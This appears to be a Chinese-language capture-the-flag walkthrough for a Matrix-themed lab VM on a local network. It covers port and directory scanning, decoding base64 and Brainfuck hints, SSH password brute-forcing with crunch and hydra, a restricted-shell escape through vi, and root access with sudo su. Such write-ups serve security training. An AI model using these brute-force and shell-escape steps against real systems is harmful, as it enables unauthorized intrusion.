靶机设置
设置靶机为NAT模式
靶机IP发现
nmp 192.168.112.0/24
靶机IP为192.168.112.133
目录扫描
dirsearch 192.168.112.133
访问浏览器
访问31337端口
查看源码
发现有base64编码内容ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg
进行解码
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
目录拼接
拼接/assets/
发现文件
拼接/Cypher.matrix
查看发现为brainfuck编码
解码成功
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
表示可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位
getshell
cat /usr/share/crunch/charset.lst 查看范围
crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric-sv -t k1ll0r@@ > pass.dic生成字典
hydra -l guest -P pass.dic ssh://192.168.112.133 -f -o 2.txt
账号:guest
密码:k1ll0r7n
ssh登录
拿到shell
提权
发现存在rabsh限制
双击Tab查看可以使用的命令
增加环境变量
vi test
:!/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
sudo -l查看免密操作
发现可以直接sudo su
查看flag文件
提权成功